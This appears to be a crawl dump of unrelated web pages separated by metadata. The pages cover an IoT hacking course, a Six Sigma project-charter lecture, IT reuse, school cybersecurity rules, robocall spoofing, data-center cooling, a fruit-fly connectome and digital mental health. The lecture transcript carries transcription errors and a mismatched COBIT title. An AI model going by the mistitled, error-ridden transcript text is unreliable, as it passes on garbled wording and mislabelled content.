2024-09-09T22:43:18Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651157.15/warc/CC-MAIN-20240909201932-20240909231932-00276.warc.gz
en
0.916617
3,624
2.671875
3
Intro to IoT Hacking with Rick Wisser and Dave Fletcher As we move further and further into the age of the Internet of Things (IoT) we are increasingly surrounded by devices that collect, analyze, and share information about the world around us. IoT devices are currently being developed and deployed to optimize processes, analyze natural phenomenon, diagnose and treat medical conditions, automate mundane tasks, and create additional conveniences for the human race. Some of these devices simply over share information that we may consider private. Others may be subverted to pose a threat to society or personal safety. The crowd-funding and maker movements have also spawned a new class of non-traditional hardware development revenue streams. This rapid prototyping and rush to market environment is excellent for innovation. However, initial offerings may be completely void of security features. In the hardware world, lack of security features can be very difficult, if not impossible, to overcome. Once a device makes it into the hands of consumers, it may remain in service with latent vulnerabilities for a very long period of time. Typical consumers also lack the ability to distinguish between secure and insecure alternatives existing in the market. In many cases, the deciding factor driving purchase is device cost. As a result, the security community must begin to understand and develop test methodologies for these types of devices so vulnerabilities can be discovered and communicated in the same responsible nature that occurs in the general computing world. This course will serve as an introduction to IoT hacking, where we look at familiar devices and lay the groundwork for hardware security analysis. In this two-day training class, the following course outline will be covered along with the opportunity to hack on several different IoT devices. - Types of Hardware - Types of tooling - Applications of different tool Attack Surface Analysis - Identifying the Attack Surfaces for specific devices - Types of Attack Surfaces - How to dump firmware from a device - Use of tools to acquire and analyze firmware - Analysis of information collected from the device (code, firmware, etc.) - Analysis while interacting with the device (webpage, SSH, Bluetooth, etc.) Other Pentesting Disciplines - How do they relate to IoT hacking - Several labs that demonstrate other attack vectors which were not demonstrated during class - Lots of hands-on learning Wild West Hackin’ Fest (Oct 8th – Oct 9th, 2024) – Deadwood, SD - October 9th – 8:30 AM to 5:00 PM MDT - October 8th – 8:30 AM to 5:00 PM MDT Wild West Hackin’ Fest at Mile High (Feb 4th – Feb 5th, 2025) – Denver, CO - February 4th – 8:30 AM to 5:00 PM MDT - February 5th – 8:30 AM to 5:00 PM MDT - At least 60GB of free hard drive space - Minimum of 8GB of RAM - X86 processor-based PC - VMWare installed - PDF reader for Slides - NOTE: VMs will not run on ARM based PCs. This class is available for training at both WWHF Deadwood 2024 and WWHF Mile High 2025. For more information about our conferences, visit Wild West Hackin’ Fest!
<urn:uuid:8083e440-7b41-4654-8852-7eb42fcde0a1>
CC-MAIN-2024-38
https://www.antisyphontraining.com/course/intro-to-iot-hacking-with-rick-wisser-and-dave-fletcher/
2024-09-13T12:40:31Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651513.89/warc/CC-MAIN-20240913101949-20240913131949-00876.warc.gz
en
0.926733
691
2.515625
3
ISACA COBIT 5 – Define (BOK IV) Part 5 11. Project Charter – Writing Project Scope (BOK IV.B.3) So far in project charter we have talked about business case, we have talked about problem statement. Now coming to the project scope, what is the scope of the project? So here we have the project charter, we have already already talked about business case, we have already talked about the problem statement. Now here we are on the project scope. So if you look here it’s looking at the start point, end point, what is the starting and the end point of the process and it is looking at what is in scope and what is out of scope. So these elements go as a part of project scope. Let’s look at these in more details on next few slides. So coming to project scope, the scope of the project need to be of just the right size. And when I say just the right size, what does that mean? That means is the scope of the project shouldn’t be too big, neither it should be too small. And when I say too big you don’t want a project of solving word hunger problem, word hunger issue. You don’t want to have that sort of a big project which you can never solve, neither you want to have a project which is too small, too small, that which doesn’t require the effort for Six Sigma methodology. Smaller projects you could have just done using seven basic quality tools or any other simple technique rather than going through the full methodology of Six Sigma process. So get the right size of the project and what is the right size of the project? Right size of the project is something which you can complete in two to three months. That’s the optimum size of a Six Sigma project. And when I talk about the scope there is depth and there is width of the scope. So coming to the depth of the scope so depth of the scope is, let’s say you have a process which has step number one, step number two, step number three, step number four in plain thing step number one could be placing an order for subsuppliers, getting the material. Step number two checking the material. Step number three production is step number four. Assembly is step number five and dispatch is step number six. So this is vertical. So here you need to make sure that what is the vertical scope of your project? Are you looking at the full chain from placing the order to subcontractor to dispatch or you are just limiting your project to the production group only or to the receipt inspection only. So that’s a vertical scope when it comes to the horizontal or the width of the scope, that means what is the width of the scope means, how much wide it is, is it related to one particular location or is it global covering all the countries? Let’s say a company has ten different production units in ten countries. Is the scope limited to one specific country or one specific location or is it related to all the ten locations. So that is the width of the project. So you need to check that what is the width and what is the depth of the scope which you want to take in your six sigma. And again, going back to the same thing, you don’t want a project which is too big. Probably you might want to do this project only on the one facility, on a one production unit. And once you have done that, then probably you might want to convey the result of that to other units. And same thing with the vertical as well. You might not want to do the project starting from placing order with the subsplier, then starting with the receipt inspection and starting with the manufacturing assembly, you don’t want to have all these steps included into the project, you might just want to limit yourself to the production. So this is how you look at the scope of the project and once you see that your scope is too big and you want to cut down on the scope, then probably you might want to do pareto analysis. So if you are taking an example of weld defects, rather than going through ten different location, ten different facilities, you might just want to take one facility or you might want to take one or two facilities which leads to the most of defects, 80% of the defects. So places where there are more problem, you might just want to include those facilities only in your project. And as we have seen on the template for the project charter, you need to have the starting point and the ending point. So starting point and the ending point could be anything like starting from the receipt in the production shop to the completion of the piece production. So something like that you need to put what is the starting point in the process and what is the ending point in the process which is included in the scope and you need to define what is in the scope and what is not in the scope or what is out of the scope. So in our example of welding, you might want to say that welding at the weld shop is only included in the scope of this project. Any welding done outside this shop which might be in the assembly or somewhere else that is not included. This is just an example to say that which area is included and which area is not included. When we talk of project scope, there is a particular item in project management terminology which is scope creep. So scope creep is something which means that your scope, if it is not fixed, if it is not finalized, will go on increasing because people will be putting more and more ideas and thoughts and your scope could never finish. In the project management, this is a common term which is scope creep. You might want to avoid scope creep. In your six sigma project, where your scope keeps on increasing, you started with one unit, and then you end up doing this project in ten units. You don’t want to do that because that way your project will never finish. So you might want to note down this term, which is scope creep. So with this, we finish our discussion on project scope definition. And this was the third item in the project. 12. Project Charter – SMART Goals and Objectives (BOK IV.B.4) So in the project charter so far we have talked about business case, problem statement and scope. So these are the elements which we have talked so far. Now, coming to goals and objectives, let’s look at that. So, as you see here on Project charter, we have talked about number one, we have talked about number two, which is problem statement number three, which is project scope. And here we want to put our goals and objectives for the Six Sigma project. So let’s understand what does this mean and how do we write that and what do we write here in goal statement? So the goal statement basically tells what is the goal of this Six Sigma project? One thing that need to be very clear, that this goal of the Six Sigma project need to be aligned with the problem statement, because the problem which you are solving is your goal. So your goal and the problem statement should align. So earlier when we talked about problem statement, our problem statement was that in our welding shop, the average weld repair rate for last three months has been 4. 5% as against the maximum target of 1%. And this is adding to the cost and delay in production. So that was our problem, that was our problem statement. But then what is our goal? Our goal is to reduce that weld repair rate from 4. 5% where it is currently since last three months, to 0. 5% maybe as against 1%, which was the norm earlier. Since we are doing Six Sigma project, we want to reduce that rate even further. And we have put here the date of end of December 2016. So we have put a target date here also. So our goal for this Six Sigma project is to reduce the well repair rate from 4. 5 to 0. 5% by end of December 2016. Let’s look at a few things here. When you are writing goal statement, first thing is that this needs to have focus on numbers, where you are and where you want to be. That should be the focus of the goal statement. And goal statement generally starts with a verb, with the action. So action is to reduce. So that’s what you will be doing. You are putting a goal statement in the form of an action, in the form of a verb. And then your goal statement should have a target date as well, because if there is no target date, then this goal doesn’t mean anything. So few things in regards to goal statement, put emphasis on number, start with a verb and put a completion date. And another thing is this goal needs to be a smart goal. And what is that smart goal? Let’s see that on the next slide. So when we say that goals or objectives need to be smart, so here smart means S for specific, m for measurable, a for Achievable, R for relevant and T for time bound. So your goal should fulfill these five factors smart, specific, measurable, Achievable, relevant and time bound. So if we look at our goal statement, which we produced here for our sample project, is to reduce the weld repair rate from 4. 5% to 0. 5% by end of December 2016. So this is a very concise, precise statement of the goal. It is very specific where we are, where we want to go. It is measurable because you can measure the weld repair rate. It is Achievable because your earlier target was 1%. So it is not unachievable goal. You can still achieve that. It is tough goal, but still it is Achievable. And that’s what the whole purpose of Six Sigma is. You don’t want something very easy goal to achieve doing Six Sigma project. And then this is irrelevant because earlier we said that this is losing the organization $300,000 every year. So that’s relevant to the organization purpose here. And it is time bound because we have put a deadline of December 2016 to complete this project. So that’s a smart goal. So that completes our discussion on goals and objectives or the goal statement in the project charter. 13. Project Charter – Project Performance Measurements (BOK IV.B.5) So in our discussion of project charter, we have talked about business case, we have talked about problem statement, project scope, goals and objectives. And now we are looking at project performance measures. How do we measure the performance of the project? So, looking at the project charter here, we have completed step number one, two, three and four. So here we are on project performance measures, and we are looking at expected savings and benefits. What is the saving, what’s the benefit of doing this project? What sort of benefits you can have from a Six Sigma project? Let’s look at those on the next slide. When you are doing Six Sigma project, you can have monetary benefits out of that, or you might have non monetary benefits out of that. Whatever you have, end of the day, it is always better to convert everything into monetary terms because that is what is going to convince management to go ahead with this project. Let’s look at some of the examples of monetary benefits which you can achieve from a Six Sigma project. One could be increasing sale and revenue. If there’s a way to increase sale, if there’s a way to increase revenue that makes a good Six Sigma project, reducing cost is another way. And in the example of this, weld repair rate. That is what we were talking of, reducing cost by reducing defects, by reducing rework. Another benefit could be avoiding cost. You can avoid cost by not buying a machine, managing with the existing resources, managing with the less people, existing people, rather than hiring new people for the new shop. That way you can avoid cost. So your Six Sigma project could be focused on avoiding additional cost for doing something, avoiding investment, doing something with the existing machinery, not buying another one. So that’s similar to avoiding cost cycle time reduction, making something faster. Because if you make something faster, then you can make more units per day. So if you make more units per day, you will be increasing your sale. You will be increasing your revenue, in fact, which will lead to increase in profits. Reducing inventory. Inventory is your money logged. So some of your money is locked in inventory. So if you reduce inventory, your money gets freed. So you have more cash to work on, more cash to produce more items. So that could be another way to work on a Six Sigma project for reducing inventory. Non monetary benefits could be having better customer satisfaction, client satisfaction, or reputation. So these are some of the examples where you can have performance of your Six Sigma project measured on these terms. So these are some of the terms on which you can have your Six Sigma project measured on. And that’s what you put in the performance measures. So in our project sample project, we could say that by doing this project, we will be saving $300,000 per year by not repairing, by not retesting those weld joints which are creating problem which are creating additional cost which are creating delay in the work process. The fintech industry is experiencing an unprecedented boom, driven by the relentless pace of technological innovation and the increasing integration of financial services with digital platforms. As the lines between finance and technology blur, the need for highly skilled professionals who can navigate both worlds is greater than ever. One of the most effective ways… Read More » In today’s digital world, cybersecurity is no longer just a technical concern; it’s a critical business priority. With cyber threats evolving rapidly, organizations of all sizes are seeking skilled professionals to protect their digital assets. For those looking to break into the cybersecurity field, earning a certification is a great way to validate your skills… Read More » If you’ve been in the IT service management (ITSM) world for a while, you’ve probably heard of ITIL – the framework that’s been guiding IT professionals in delivering high-quality services for decades. The Information Technology Infrastructure Library (ITIL) has evolved significantly over the years, and its latest iteration, ITIL 4, marks a substantial shift in… Read More » As cybersecurity threats become increasingly sophisticated and pervasive, traditional security models are proving inadequate for today’s complex digital environments. To address these challenges, modern security frameworks such as SASE (Secure Access Service Edge) and Zero Trust are revolutionizing how organizations protect their networks and data. Recognizing the shift towards these advanced security architectures, Cisco has… Read More » The cybersecurity landscape is constantly evolving, and with it, the certifications that validate the expertise of security professionals must adapt to address new challenges and technologies. CompTIA’s CASP+ (CompTIA Advanced Security Practitioner) certification has long been a hallmark of advanced knowledge in cybersecurity, distinguishing those who are capable of designing, implementing, and managing enterprise-level security… Read More » The cloud landscape is evolving at a breakneck pace, and with it, the certifications that validate an IT professional’s skills. One such certification is the Microsoft Certified: DevOps Engineer Expert, which is validated through the AZ-400 exam. This exam has undergone significant changes to reflect the latest trends, tools, and methodologies in the DevOps world.… Read More »
<urn:uuid:dbf034b6-807f-40fd-8d61-f81574df9ea6>
CC-MAIN-2024-38
https://www.examcollection.com/blog/isaca-cobit-5-define-bok-iv-part-5/
2024-09-13T12:09:00Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651513.89/warc/CC-MAIN-20240913101949-20240913131949-00876.warc.gz
en
0.96143
3,271
2.703125
3
Before you recycle your old devices responsibly, you should consider reuse and repair! Your old IT assets may still have a remaining useful life. These processes can provide monetary value for your organization as well as positive sustainable practices for our planet. Read below for the importance of reuse and repair. The Importance of Reuse Reuse offers the opportunity to extend the life of a device. Instead of throwing away your device or recycling it right away, they can be reused and redeployed either within your organization or by another. Full-service ITAD companies can provide redeployment and remarketing options. Reuse assures maximum value for IT assets as well as minimizing the amount of electronic waste that ends up in our landfills. The Importance of Repair Repair provides a life extension for devices that are not operating properly. This can be as simple as replacing a hard drive, battery, processor, etc. Some ITAD companies can provide repair services or purchase your devices to use for parts to repair others’ systems. Repair could save you money from buying a new device, but it also contributes positively to minimizing electronic waste. Reuse & Repair with Lifespan Lifespan is a strong believer in the Reuse & Repair philosophy. This is outlined by our value back & recovery program and our membership with the Right to Repair Association. By extending the life of a device, you can save costs for your organization and reduce the amount of electronic waste produced each year. Do you want to build a better planet and a brighter future? Schedule a call with one of our experts to get started.
<urn:uuid:e5d12830-fc89-469c-98de-900b5fb1a84f>
CC-MAIN-2024-38
https://www.lifespantechnology.com/the-importance-of-reuse-and-repair%EF%BF%BC/
2024-09-13T11:06:16Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651513.89/warc/CC-MAIN-20240913101949-20240913131949-00876.warc.gz
en
0.938517
326
2.640625
3
As schools are further implementing the use of technology in the classroom, educators need to make sure that they’re taking the necessary precautions to keep that technology secure. Cyber threats are a real danger, and schools need to take steps to protect themselves from those cyber risks. One way to do that is by developing basic classroom technology rules. Schools are responsible for keeping both staff and students safe from cyber attacks. In order to do that, they need to have measures in place to protect themselves from cyber threats. There has been an 18% increase in cyber attacks targeting schools since 2019. Establishing classroom technology rules will help reduce the number of successful attacks threatening schools. In this blog, we’ll discuss some classroom technology rules that your school can implement in order to stay protected from cyber threats. Protecting Your Classroom With Basic Cybersecurity Rules One of the most important things schools can do to protect themselves is to be aware of the cybersecurity threats that are specifically targeting the education sector so they can be prepared. There are a few rules to follow to keep your school prepared and protected from cyber criminals: - Install antivirus software on all devices and keep it up-to-date – Antivirus software helps protect your computer from viruses. Install antivirus software on all devices and then keep that software up-to-date. Antivirus software companies release new virus definitions regularly, and these definitions are what help the software detect and remove viruses from your computer. - Implement a Password Policy for All Connected Devices – One of the most important classroom technology rules to follow is to keep devices password protected. If devices aren’t password protected, anyone who has access to them can view your files, install software, or change your settings. This can make your device vulnerable to cyber attacks. - Only allow authorized personnel to install software on devices – When it comes to installing software on school devices, you should only allow authorized personnel to do so. Installing software can change the settings on a device and make it vulnerable to cyber attacks. By limiting software installation to authorized personnel, schools can help reduce the risk of cyber attacks. - Educate staff and students about cybersecurity threats and how to protect themselves – It’s essential to educate both staff and students about the dangers of cyber attacks. Staff need to be aware of the dangers so they can protect themselves and their students. And students need to learn how to protect themselves from cyber threats. One available resource for recognizing and preventing cyberattacks is through security awareness training with Hook Security. Phishing training that is easily digestible and informative helps students and staff learn about phishing and the importance of device and internet safety, - Create security policies governing acceptable use of technology in the classroom – Creating policies for acceptable use of technology in the classroom protects schools and users from cyber threats. Schools can help reduce the number of successful attacks threatening their systems when policies are developed. By having policies in place, it will be easier to enforce the rules and take action if they’re broken. If you don’t have policies in place, it’s more difficult to take action against someone who breaks the rules because there’s no clear guidance on what is and isn’t allowed. - Implement a Bring Your Own Device (BYOD) policy – With BYOD, students and staff are allowed to bring their personal devices to school and use them for educational purposes. One of the biggest risks is that personal devices are generally less secure than school-issued devices. Schools should implement a BYOD policy that outlines the expectations and rules for using personal devices on the school network. - Regularly back up data – A simple yet crucial classroom technology rule to follow is to regularly back up your data. This helps protect you from losing your data in the event of hardware failure, natural disaster or a cyber attack. It is also a best practice to regularly test the backed up data to ensure it is usable in case you need it. - Deploy a Zero Trust Network– Aruba Networks, for example, has built-in Zero Trust and SASE security that ensure that the same access controls applied to campus or branch networks, also extend to the home or remote worker across wired, wireless, and WAN connections. Partner with ANC Group for Secure Classroom Technology We understand that not all schools have the same resources available to them. However, implementing even a few of these classroom technology rules will help to better protect your school from cyber threats. ANC Group is available to protect your school using tools and techniques that are the most effective. We’ll help you decide which network products will work best for your school, and customize options based on your specific needs. Act now and get a free technology assessment with our team of experts.
<urn:uuid:99f853ab-e618-4ea1-acce-7fa735101403>
CC-MAIN-2024-38
https://ancgroup.com/8-classroom-technology-rules-every-school-should-implement/
2024-09-14T17:10:02Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00776.warc.gz
en
0.952058
976
3.671875
4
The motherboard is the backbone of a computer, a key component that connects all other parts, allowing them to communicate and work together. It is a large circuit board that houses the CPU, memory, and connectors for other peripherals. The CPU, or Central Processing Unit, is often called the computer’s brain, performing calculations, and running programs. Together, they form the core of computer operations, with the motherboard providing the necessary pathways for data and the CPU executing instructions to carry out tasks. The motherboard and CPU rely on each other to function effectively. The motherboard ensures power is distributed properly, expansion cards are connected, and accessible to BIOS. At the same time, the CPU carries out the commands that make your computer do everything from browsing the internet to playing games without the motherboard’s infrastructure, the CPU would have no way to interact with other components, and without the CPU’s processing power, the motherboard would be lifeless.
<urn:uuid:d3e0fe2e-1dcb-4731-927b-122a107beb72>
CC-MAIN-2024-38
https://mile2.com/forums/reply/94760/
2024-09-14T17:36:21Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00776.warc.gz
en
0.945148
190
3.921875
4
Everything you need to know about STIR/SHAKEN Fraudulent calls have been around for a long time, however due to robocalling technology the number of fraudulent calls are rising each year. So what is robocalling exactly? A robotic call, or robocall, is a phone call that is automatically placed by a computer. The computer has a list of numbers to dial and the moment you answer it will either connect you to an agent or play a pre-recorded message. The systems can dial multiple recipients at the same time, making robocalling a relatively inexpensive method to use. Though robocalls can be legit, as they are still used for weather alerts, pollical campaign messages, broadcasts from essential services and more, this technology is also used for fraudulent purposes and this number is rising. Today more than 40% the robocalls made are fraudulent. Caller ID Spoofing Most fraudulent calls display a number that is altered to spoof those of legitimate organizations, increasing the chance that victims answer the call. Victims think that it was the Police, a delivery firm or their bank that was trying to contact them. Fraudulent Robocall Warning Signs - You receive an automated sales call from a company you have not given consent to contact you. - A prerecorded message tells you to press “1” or some other key to be taken off a call list. - The message offers you goods or services for free or at a suspiciously deep discount. - The message says you owe back taxes or unpaid bills and face legal or financial consequences if you don’t pay immediately. - The message says you’ve won a big lottery or sweepstakes prize and tells you to press a key or call a number to claim it. If you receive these calls, hang up and do not press any keys. If the robocall claims to be from, say, your bank, look up their phone number online, call and ask if they contacted you. In response to the growing number of fraudulent calls, the FCC has adopted rules requiring service providers to deploy a STIR/SHAKEN solution by June 30, 2021. STIR/SHAKEN is a technology framework designed to reduce fraudulent robocalls and illegal phone number spoofing. STIR stands for Secure Telephony Identity Revisited. SHAKEN stands for Secure Handling of Asserted information using toKENs. Many carriers and service providers have created tools to identify and block fraudulent calls. Unfortunately, these tools aren’t perfect. Sometimes legitimate calls are marked as “SPAM LIKELY”, “SPAM RISK” or “SCAM LIKELY” incorrectly. If your phone number is incorrectly marked as spam or blocked, read here what you can do about it. Are you still confused and want to learn more about STIR/SHAKEN and what Dynamix is doing to combat call fraud? Schedule a call with one of our experts to get your STIR/SHAKEN questions answered.
<urn:uuid:aca867ca-7c1e-491c-a6be-d23073c85b6e>
CC-MAIN-2024-38
https://www.dynamixcloud.com/blog/everything-you-need-to-know-about-stir-shaken/
2024-09-14T18:36:36Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00776.warc.gz
en
0.935872
629
2.796875
3
Word tables are powerful, flexible and fully customizable. This video will help you learn how to use tables to your advantage. It will also give you new ideas and may be, solve some problems as well. The Ultimate Guide is a comprehensive guide to using tables in Microsoft Word. It covers all aspects of working with tables in Word, from creating and formatting them to manipulating data within them. This guide also explains how to use features such as sorting, filtering, conditional formatting and other advanced features available when working with tables. Additionally, it provides best practices for ensuring that your documents look great and are easy to read while still providing the necessary information. Finally, this guide offers advice on troubleshooting common issues related to working with tables in Word. How to Format Microsoft Word Tables Using Table Styles (Ultimate Guide). Table styles menu for formatting tables in Microsoft Word.
<urn:uuid:0a9f9d73-1ba5-4ba3-a0ed-784c75771af3>
CC-MAIN-2024-38
https://www.hubsite365.com/en-ww/crm-pages/word-tables-best-practices-2023-the-ultimate-guide.htm
2024-09-20T23:05:33Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701425385.95/warc/CC-MAIN-20240920222945-20240921012945-00276.warc.gz
en
0.897083
172
2.8125
3
Emerging technologies, trends, and opportunities are impacting the way data centers perform the urgent, and often challenging, task of cooling their servers and other network equipment to minimize PUE and satisfy upper management at the same time. The investment in data center cooling can be significant, and the responsibility is daunting. It’s a rare operation of any kind that isn’t wholly dependent on its data management foundation, and overheating, which can occur in a swiftly escalating domino effect at a second’s notice, can bring an entire global operation to a halt, stranding and impacting the productive time of hundreds or thousands of users. The demand for data storage and usage was growing at a fast clip when COVID-19 dramatically changed everything, including the way we work, and the sudden increase in people working remotely rapidly escalated digital demand to record-high levels. And, even as the world returns to a more normal state, a reduction to prior levels of remote demand is unlikely. Lowering Cooling Costs Most commonly, the cooling strategy of choice for many data centers is similar to what has been used for decades — generating cool air to lower ambient temperatures using chilled, water-based CRAHs or CRACs. Yet, the technologies and methodologies to do so have progressed significantly in multiple directions. For example, the cool air is often better focused, brought closer and closer to where it is needed — from the room to the row to the racks — to increase efficiency. Over the years, computers and servers have become more tolerant of higher temperatures; thus, the equipment doesn’t have to always be kept in the “human comfort zone" to maintain effective operation. In order for the cooling system to fully benefit from this change, the HVAC equipment must be able to generate higher leaving water set points. Some traditional chiller technologies, such as screw compressors, are not able to do this effectively. New computer equipment designs can operate at higher space temperatures, enabling chillers to generate leaving water temperatures as high as 82ºF, reducing compressor power consumption and helping data centers reduce operating costs. Additional technologies, such as oil-free compressors, may be introduced as well in order to realize the full benefits of this type of system. This new chiller application capability is better enabled by the advent of oil-free compressors, which do not require oil for lubrication because the motor shaft levitates in a magnetic field. In addition to potentially providing several efficiency gains and reducing energy costs, this technology can also potentially reduce maintenance costs for data centers. For example, there is no need to periodically change the compressor oil and oil filter, and there is no mechanical wear to the system since there is no metal-to-metal contact. Operations using oil-free compressors can reduce their maintenance costs some 30% or more over those using traditional fixed-speed positive displacement compressors. Another advantage of oil-free compressors is that because oil and mechanical wear have been eliminated, the performance remains consistent over time. Often, companies look to improve their energy performance for environmental and/or financial reasons and are delighted by the reduction in carbon footprint that often moves in lockstep with reducing energy consumption. With an average annualized PUE of 1.57, data center losses are currently adding about 60% to the energy use of IT. And, while more new builds are designed with PUEs of 1.3 or less, it is not economically or technically feasible for many operators to perform the major overhauls needed for better efficiency in many older facilities. However, there are easy gains to be had from better airflow management, optimized controls, and equipment replacement. Further improvements might require significant change, such as retrofits with highly efficient cooling systems. Similarly, a move to different compressor technology often allows a move to a more environmentally benign refrigerant. For example, most screw and centrifugal compressors today use R-134a, which has a global warming potential (GWP) of 1,400. Oil-free compressors can be used with several refrigerants, including low-GWP R-513A and R-515B or ultralow-GWP HFO-1234ze. Another recent innovation takes the idea of focusing cooling closer to the heat to its logical conclusion and utilizes a cold plate placed on the server that's connected to a chilled water loop that carries the heat outside. Another alternative design concept involves specially designed servers submerged in dielectric cooling fluid that rejects heat directly from the server to the fluid. Moving Beyond PUE Data center HVAC systems have long been managed as a cost center with a focus on continually reducing the operating costs through various efficiency improvements. However, many companies today are benefitting from an emerging solution that replaces the cost model with an entirely new paradigm — removed heat is not dissipated into the air but is instead recovered and sold as a valuable commodity to those who need it at the time. Considering how much energy is spent to heat buildings from scratch, this is obviously a need waiting to be filled — especially in colder and temperate climates. The general concept is familiar to many industries. In fact, many industrial plants use their waste heat in a cogeneration model, where heat removed from a process is disseminated to another area of the facility that demands heat. This reduces the amount of energy that must be otherwise generated or purchased from utility providers. Data centers produce heat 24/7, making them a de-facto reliably consistent “generator.” Once that paradigm shift is made, there are some upfront infrastructure costs, but the concept can pay for itself and become a profit center fairly quickly based on recent demonstration projects. If the data center is close to a district heating infrastructure, which collects and generates heat for dispersion to a nearby campus or even to an entire municipality, the supply infrastructure is ready-made. But, it can also be cost-effective to create a new grid around many campus-like facilities, such as colleges or business parks, where heat must be provided to many adjacent rooms and buildings. Hyperscale and enterprise companies, with their mega-scale facilities, especially have the flexibility to locate in northern climates, which they have been doing the last several years, creating the heat recovery scale needed for these district heating systems. The higher data center operating temperatures also means the heat pumps applied to maintain cooling while also recovering heat operate at optimal efficiency, lowering the resulting heat price and justifying base-loading the heat source. Additionally, on-site backup power means a constant supply of recovered heat under demand response or other power interruption scenarios. Oil-free compressors can help with this shift through recent advances that have expanded the operating map to support heating applications. High-lift, oil-free compressors have the ability to generate higher leaving water temperature for use in heating applications, which, in the past, have commonly used traditional oil-lubricated, positive displacement compressors. Using oil-free compressors for this application brings the benefits of reduced maintenance and no performance degradation over the life of the compressor. In this model, the HVAC system becomes a revenue-generator for the enterprise and can ultimately provide an energy source that would otherwise be wasted if released into the atmosphere. Finally, this model can go a long way for companies looking to reduce their carbon footprints and contribute toward their decarbonization and net-zero emissions goals.
<urn:uuid:9218617b-795f-416f-ad52-4c62e06a5404>
CC-MAIN-2024-38
https://www.missioncriticalmagazine.com/articles/93891-cool-technologies-trends-and-opportunities
2024-09-08T18:59:47Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651017.43/warc/CC-MAIN-20240908181815-20240908211815-00476.warc.gz
en
0.950034
1,513
2.75
3
Researchers understand the structure of brains and have mapped them out in some detail, but they still don’t know exactly how they process data — for that, a detailed “circuit map” of the brain is needed. Now, scientists have created just such a map for the most advanced creature yet: a fruit fly larva. Called a connectome, it diagrams the insect’s 3016 neurons and 548,000 synapses, Neuroscience News has reported. The map will help researchers study better understand how the brains of both insects and animals control behavior, learning, body functions and more. The work may even inspired improved AI networks. “Up until this point, we’ve not seen the structure of any brain except of the roundworm C. elegans, the tadpole of a low chordate, and the larva of a marine annelid, all of which have several hundred neurons,” said professor Marta Zlatic from the MRC Laboratory of Molecular Biology. “This means neuroscience has been mostly operating without circuit maps. Without knowing the structure of a brain, we’re guessing on the way computations are implemented. But now, we can start gaining a mechanistic understanding of how the brain works.” To build the map, the team scanned thousands of slices from the larva’s brain with an electron microscope, then integrated those into a detailed map, annotating all the neural connections. From there, they used computational tools to identify likely information flow pathways and types of “circuit motifs” in the insect’s brain. They even noticed that some structural features closely resembled state-of-the-art deep learning architecture. Scientists have made detailed maps of the brain of a fruit fly, which is far more complex than a fruit fly larva. However, these maps don’t include all the detailed connections required to have a true circuit map of their brains. As a next step, the team will investigate the structures used for behavioural functions like learning and decision making, and examine connectome activity while the insect does specific activities. And while a fruit fly larva is a simple insect, the researchers expect to see similar patterns in other animals. “In the same way that genes are conserved across the animal kingdom, I think that the basic circuit motifs that implement these fundamental behaviours will also be conserved,” said Zlatic.
<urn:uuid:0f772ee1-a3bb-4bcd-91af-09147d9f53dd>
CC-MAIN-2024-38
https://www.akibia.com/scientists-create-the-most-complex-map-yet-of-an-insect-brains-wiring/
2024-09-11T06:05:54Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651344.44/warc/CC-MAIN-20240911052223-20240911082223-00276.warc.gz
en
0.930534
502
3.65625
4
Owning a pocket-fitted supercomputer is an advantage that would make our ancestors envy the bone. There are two sides to the coin, however. 21st-century tech is made to help us do things without much attention to the effects it has on our mental health. It’s almost redundant to proclaim that social media affects our daily lives. Virtually impossible to escape, various media platforms plague our daily lives, be it our work, leisure, or reaching out to loved ones. Billions of people started the last decade with playful tags such as ‘YOLO’ (you only live once), unaware that the next decade will be marked by four letters with more somber meaning – ‘FOMO’ or fear of missing out. FOMO describes the feeling of worry or anxiety that you miss out on an exciting experience and that others may lead a better life than you do. Or a sense most of us get after seeing photos of vacationing friends while stuck in our daily routines, made ever more mundane over the aeons of self-isolation. Fear of missing out is not a new phenomenon and is closely related to the individual need to be satisfied with our competence, autonomy, and relatedness. Social media, however, amplifies FOMO with ‘highlight reels’ variously named on different social media sites. Continuously comparing ourselves to others may impact our self-esteem and even conjure a feeling of hopelessness. Studies show that to avoid FOMO, people feel pressured to be constantly available and seek new connections, abandoning present ones. Unsurprisingly, the result is a heightened sense of isolation. The goldfish effect Unsurprisingly, with uninterrupted access to the web, people tend to rely on smartphones for information. So much so that easy access to vast troves of information might overload our senses. That causes our brain to store information poorly, leads to fatigue, and affects our attention span. The National Centre for Biotechnology Information study in the US showed that the average human attention span had dropped from 12 seconds in 2000 to eight seconds in 2013. Since attention span in young kids is shown to predict their math and reading abilities later on in life, shortening attention span can cause long-term problems that we don’t know the effects of. Living in a world where news spreads faster than wildfire has its drawbacks. There’s little difference between whether the information being distributed is true or not. Thus, a worrying amount of fake news starts to circulate online. Even if we forget the political ramifications spreading lies has on societies globally, the coronavirus pandemic has shown what damage online lies can have. Dubbed ‘infodemic’ by the World Health Organization (WHO), it has taken hundreds of lives globally. A study published in the American Journal of Tropical Medicine and Hygiene showed that misinformation on COVID-19 killed at least 800 people, with 5,800 hospitalized. With all things digital embedded into our daily lives, concerns about our safety online become a part of our existence. Predictably, constant fear of personal details leaking online is a cause of anxiety, as a recent study on data privacy shows. Even with our data well secured, there are ways threat actors employ artificial intelligence to create deepfake pictures to shame and blackmail people. For example, a 2019 report on deepfakes by Sensity, an Amsterdam-based visual threat intelligence company, found that the vast majority of deepfakes online are used for porn. Moreover, a report by the UCL, published in August 2020, claims that fake audio and video content with extortion applications is among the top crimes of the future that begins now. There are even cases where AI-powered voice generators were used to steal hundreds of thousands from unsuspecting victims. With people using ever more password-protected accounts, anxiety over lost passwords is slowly creeping in to complement other digital woes a modern life is full of. A recent survey shows that a third of respondents feel that recovering a lost password can be as stressful as losing employment. Participants claim that owning multiple password-protected accounts can be tricky since it’s not easy to remember all the passwords. On 